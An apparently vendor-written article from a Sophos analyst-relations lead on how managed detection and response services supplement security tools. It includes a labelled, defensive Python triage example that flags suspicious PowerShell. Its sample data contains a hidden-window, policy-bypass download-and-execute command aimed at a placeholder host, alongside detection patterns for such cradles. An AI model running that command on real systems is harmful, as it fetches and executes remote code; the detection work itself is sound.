September 30, 2022
How Managed Detection and Response Services Bolster Cyber Defenses
A partner with advanced threat-hunting capabilities can augment internal tools and teams.
Managed detection and response (MDR) is one of the fastest-growing areas in cybersecurity. Gartner projects that by 2025, 50 percent of organizations will have adopted an MDR service. Today, however, many organizations are still trying to figure out how MDR fits into their existing tools and capabilities.
MDR combines human expertise and sophisticated technologies to deliver 24/7 monitoring: looking for threats, conducting investigations and responding to suspicious activity. Unlike incident response services, MDR is proactive. The goal is to prevent a breach from occurring in the first place. The best MDR providers use an extended detection and response solution that provides visibility into all the areas where users and data may exist — a necessary capability given the nature of work today.
Let’s look at a few scenarios where MDR could benefit an organization.
As Hackers Evolve Their Tactics, Security Tools Alone Aren’t Enough
It’s tempting to believe your defenses are secure if you deploy an arsenal of advanced security solutions. Unfortunately, many organizations don’t fully appreciate that security tools alone aren’t always enough.
At this point, most endpoint protection tools are effective at detecting known threats. When they encounter a situation they’ve seen before, they can take action against it without human intervention. In other cases, tools can detect a threat and block the initial instance, but they still need someone to investigate to ensure the rest of the environment remains secure.
The problem is that attackers know how security tools function, and they know how to evade detection. Increasingly, adversaries are launching “living off the land” attacks in which they take advantage of legitimate tools to exploit vulnerabilities.
One of the most common techniques is the malicious use of PowerShell. No matter how good security tools are, they can’t distinguish between malicious and legitimate uses of PowerShell. The best they can do is to flag activity that might indicate an attacker, prompting a human to investigate the potential threat and determine what action is needed.
Another common scenario is that an attacker does something new in the environment that the security tool hasn’t encountered before. Once again, the tool can’t take action, so human intervention is needed.
MDR services address these gaps through an ongoing process of threat hunting. A security analyst who knows how to think like an attacker continually looks for threats that have evaded detection by security tools. When a tool encounters a new attack type or new suspicious behavior, the analyst is the last line of defense.
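The PowerShell point above (a tool can only flag activity that might indicate an attacker and hand it to a human) is easier to see with a small triage routine. The following is an added illustration, not code from the article or from any MDR vendor's product: it scores constructed process-creation events against a few widely published PowerShell indicators, decodes any -EncodedCommand payload so the analyst can read it, and queues everything over a threshold for human review. The event layout, the indicator weights and the review threshold are assumptions chosen for the example. Note that the encoded command in the sample turns out to be a harmless Get-Process, which is exactly the case the article describes: the tool cannot tell, so it flags, and the analyst decides.

```python
"""Triage PowerShell command lines and flag those that need an analyst's eyes.

Added example for illustration; not code from the article or from any product.
The event fields, indicator weights and threshold below are assumptions.
"""
import base64
import re

# Generic indicator patterns (case-insensitive) that are common in published
# detection content, each with a label and an assumed weight.
INDICATORS = [
    (re.compile(r"-(enc|encodedcommand)\s+\S+", re.I), "encoded command", 3),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window", 2),
    (re.compile(r"-(ep|ex|executionpolicy)\s+bypass", re.I), "execution policy bypass", 2),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I), "remote download", 3),
    (re.compile(r"invoke-expression|\biex\b", re.I), "dynamic code execution", 2),
]
REVIEW_THRESHOLD = 3  # assumption: at or above this score a human must look


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None.

    The decoded text is surfaced for the analyst; the tool does not judge it.
    """
    m = re.search(r"-(?:enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", command_line, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Score one event record {'host', 'user', 'command_line'} (assumed layout).

    Returns a triage dict with the score, matched indicator labels, any decoded
    payload, and whether the event crosses the review threshold.
    """
    cmd = event["command_line"]
    matched = [(label, weight) for pat, label, weight in INDICATORS if pat.search(cmd)]
    score = sum(weight for _, weight in matched)
    return {
        "host": event["host"],
        "user": event["user"],
        "score": score,
        "indicators": [label for label, _ in matched],
        "decoded": decode_encoded_command(cmd),
        "needs_review": score >= REVIEW_THRESHOLD,
    }


def triage(events):
    """Return the events an analyst should investigate, highest score first."""
    results = [score_event(e) for e in events]
    return sorted((r for r in results if r["needs_review"]), key=lambda r: -r["score"])


# Constructed sample events, modelled on the fields a process-creation log carries.
# The encoded payload is built here so the sample stays readable; it is benign.
_BENIGN_ENCODED = base64.b64encode("Get-Process".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"host": "ws-01", "user": "admin",
     "command_line": "powershell.exe Get-ChildItem C:\\Logs"},
    {"host": "ws-02", "user": "svc-backup",
     "command_line": f"powershell.exe -enc {_BENIGN_ENCODED}"},
    {"host": "ws-03", "user": "jdoe",
     "command_line": "powershell.exe -w hidden -ep bypass IEX "
                     "(New-Object Net.WebClient).DownloadString('http://example.invalid/s')"},
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        line = f"{r['host']} ({r['user']}): score={r['score']} indicators={r['indicators']}"
        if r["decoded"]:
            line += f" decoded={r['decoded']!r}"
        print(line)
```

Running it queues ws-03 first (several indicators stacked) and ws-02 second (a lone encoded command that decodes to Get-Process). The second item is the one that costs analyst time: the heuristics cannot clear it, which is the capability gap the article says threat hunters fill.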
Organizations Struggle to Acquire True Threat-Hunting Expertise
The increasing sophistication of hackers isn’t the only reason to adopt MDR. Another common motivation is the need to address a talent gap. Many organizations find it difficult to hire cybersecurity professionals who can use security tools effectively. Even organizations that manage to hire security professionals find that they may not have all the specialized capabilities needed to engage in threat hunting. In addition, as attackers have become more sophisticated, so have security tools — which means there are even fewer people equipped to use them effectively.
Some organizations adopt MDR in the wake of a breach. They’ve experienced it once and want to ensure it does not happen again. Organizations undergoing fast growth may invest in MDR proactively. They know that as they grow, they’ll collect and produce more data, and they want to minimize the security vulnerabilities associated with data sprawl.
For many organizations, the decision comes down to which threats are the most significant for their environments, which tools they need to optimize their visibility and where capability gaps prevent them from deriving full value from those tools. MDR is proving to be an essential defense for organizations that want to stay one step ahead of attackers.
Story by Eric Kokonas, the global head of analyst relations at Sophos.